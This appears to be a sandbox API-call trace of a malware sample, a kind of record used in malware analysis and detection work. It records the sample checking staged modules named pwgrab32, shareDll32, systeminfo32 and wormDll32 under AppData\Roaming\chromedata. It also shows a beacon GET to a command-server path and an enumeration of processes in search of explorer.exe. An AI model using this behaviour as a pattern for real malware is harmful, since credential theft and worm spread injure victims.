	[0242.872] GetFullPathNameW (in: lpFileName="Data\\pwgrab32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32", lpFilePart=0x0) returned 0x3e
	[0242.872] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x690
	[0242.872] GetFileTime (in: hFile=0x690, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x5ee1e7a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0242.872] CloseHandle (hObject=0x690) returned 1
	[0242.872] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x78764e40, dwHighDateTime=0x1d50a6a)) 
	[0242.872] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32") returned="shareDll32"
	[0242.872] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0242.872] GetFullPathNameW (in: lpFileName="Data\\shareDll32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32", lpFilePart=0x0) returned 0x40
	[0242.872] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\sharedll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x690
	[0242.873] GetFileTime (in: hFile=0x690, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x70fa1b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0242.873] CloseHandle (hObject=0x690) returned 1
	[0242.873] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x78764e40, dwHighDateTime=0x1d50a6a)) 
	[0242.873] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32") returned="systeminfo32"
	[0242.873] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0242.873] GetFullPathNameW (in: lpFileName="Data\\systeminfo32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32", lpFilePart=0x0) returned 0x42
	[0242.873] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\systeminfo32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x690
	[0242.873] GetFileTime (in: hFile=0x690, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x46215b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0242.873] CloseHandle (hObject=0x690) returned 1
	[0242.873] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x78764e40, dwHighDateTime=0x1d50a6a)) 
	[0242.873] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32") returned="wormDll32"
	[0242.873] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0242.873] GetFullPathNameW (in: lpFileName="Data\\wormDll32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32", lpFilePart=0x0) returned 0x3f
	[0242.873] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\wormdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x690
	[0242.873] GetFileTime (in: hFile=0x690, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a)) returned 1
	[0242.874] CloseHandle (hObject=0x690) returned 1
	[0242.874] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x78764e40, dwHighDateTime=0x1d50a6a)) 
	[0242.874] WinHttpCloseHandle (hInternet=0x27e7968) returned 1
	[0242.874] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0242.874] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1/6Rk6Rn8Of2NfvEUk0HXo6Qk2/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7968
	[0242.874] WinHttpSetOption (hInternet=0x27e7968, dwOption=0x1f, lpBuffer=0x128bf0, dwBufferLength=0x4) returned 1
	[0242.874] WinHttpSendRequest (hRequest=0x27e7968, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0243.191] WinHttpReceiveResponse (hRequest=0x27e7968, lpReserved=0x0) returned 1
	[0243.191] WinHttpQueryHeaders (in: hRequest=0x27e7968, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128be0, lpdwBufferLength=0x128bdc, lpdwIndex=0x0 | out: lpBuffer=0x128be0*, lpdwBufferLength=0x128bdc*=0x4, lpdwIndex=0x0) returned 1
	[0243.191] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x3) returned 1
	[0243.192] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22fffa8
	[0243.192] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x22fffa8, dwNumberOfBytesToRead=0x3, lpdwNumberOfBytesRead=0x128bdc | out: lpBuffer=0x22fffa8*, lpdwNumberOfBytesRead=0x128bdc*=0x3) returned 1
	[0243.192] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x0) returned 1
	[0243.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22fffa8, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3
	[0243.192] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe28
	[0243.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22fffa8, cbMultiByte=3, lpWideCharStr=0x22ffe28, cchWideChar=3 | out: lpWideCharStr="/1/") returned 3
	[0243.192] StrStrIW (lpFirst="/1/", lpSrch="/") returned="/1/"
	[0243.192] StrStrIW (lpFirst="1/", lpSrch="/") returned="/"
	[0243.192] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffdb0
	[0243.192] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff660
	[0243.192] lstrcpynW (in: lpString1=0x22ff660, lpString2="1/", iMaxLength=2 | out: lpString1="1") returned="1"
	[0243.192] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ea8) returned 1
	[0243.192] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22b79c8) returned 1
	[0243.192] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe28) returned 1
	[0243.192] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffdb0) returned 1
	[0243.192] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22fffa8) returned 1
	[0243.192] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6e4
	[0243.195] Process32FirstW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0243.196] lstrcmpW (lpString1="explorer.exe", lpString2="[System Process]") returned 1
	[0243.196] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0243.197] lstrcmpW (lpString1="explorer.exe", lpString2="System") returned -1
	[0243.197] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0243.197] lstrcmpW (lpString1="explorer.exe", lpString2="smss.exe") returned -1
	[0243.198] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0243.199] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0243.199] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0243.200] lstrcmpW (lpString1="explorer.exe", lpString2="wininit.exe") returned -1
	[0243.200] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0243.201] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0243.201] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0243.201] lstrcmpW (lpString1="explorer.exe", lpString2="winlogon.exe") returned -1
	[0243.201] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0243.202] lstrcmpW (lpString1="explorer.exe", lpString2="services.exe") returned -1
	[0243.202] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0243.203] lstrcmpW (lpString1="explorer.exe", lpString2="lsass.exe") returned -1
	[0243.203] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0243.204] lstrcmpW (lpString1="explorer.exe", lpString2="lsm.exe") returned -1
	[0243.204] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.205] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0243.205] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.206] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0243.206] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.207] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0243.207] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.208] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0243.208] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.209] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0243.209] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.210] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0243.210] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.210] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0243.210] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0243.211] lstrcmpW (lpString1="explorer.exe", lpString2="spoolsv.exe") returned -1
	[0243.211] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.212] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0243.212] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0243.213] lstrcmpW (lpString1="explorer.exe", lpString2="taskhost.exe") returned -1
	[0243.213] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0243.214] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0243.214] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0243.215] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0243.215] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0243.216] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0243.216] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0243.217] lstrcmpW (lpString1="explorer.exe", lpString2="sppsvc.exe") returned -1
	[0243.217] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0243.218] lstrcmpW (lpString1="explorer.exe", lpString2="dwm.exe") returned 1
	[0243.218] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0243.219] lstrcmpW (lpString1="explorer.exe", lpString2="explorer.exe") returned 0
	[0243.219] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0243.220] lstrcmpW (lpString1="explorer.exe", lpString2="audiodg.exe") returned 1
	[0243.220] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0243.221] lstrcmpW (lpString1="explorer.exe", lpString2="shirts_cumshots_compaq.exe") returned -1
	[0243.221] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0243.222] lstrcmpW (lpString1="explorer.exe", lpString2="league.exe") returned -1
	[0243.222] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0243.223] lstrcmpW (lpString1="explorer.exe", lpString2="js_sound.exe") returned -1
	[0243.223] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0243.224] lstrcmpW (lpString1="explorer.exe", lpString2="beast-dry.exe") returned 1
	[0243.224] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0243.224] lstrcmpW (lpString1="explorer.exe", lpString2="forecastsgeographic.exe") returned -1
	[0243.224] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0243.225] lstrcmpW (lpString1="explorer.exe", lpString2="reno.exe") returned -1
	[0243.225] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0243.226] lstrcmpW (lpString1="explorer.exe", lpString2="specreformwear.exe") returned -1
	[0243.226] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0243.227] lstrcmpW (lpString1="explorer.exe", lpString2="rr_publications.exe") returned -1
	[0243.227] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0243.228] lstrcmpW (lpString1="explorer.exe", lpString2="solo.exe") returned -1
	[0243.228] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0243.229] lstrcmpW (lpString1="explorer.exe", lpString2="beam.exe") returned 1
	[0243.229] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0243.230] lstrcmpW (lpString1="explorer.exe", lpString2="configurations.exe") returned 1
	[0243.230] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0243.231] lstrcmpW (lpString1="explorer.exe", lpString2="fact-film-anticipated.exe") returned -1
	[0243.231] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0243.231] lstrcmpW (lpString1="explorer.exe", lpString2="wanting villages.exe") returned -1
	[0243.232] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0243.232] lstrcmpW (lpString1="explorer.exe", lpString2="engagementresearchersmonkey.exe") returned 1
	[0243.232] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0243.233] lstrcmpW (lpString1="explorer.exe", lpString2="surgical-marcus.exe") returned -1
	[0243.233] Process32NextW (in: hSnapshot=0x6e4, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0243.234] lstrcmpW (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1
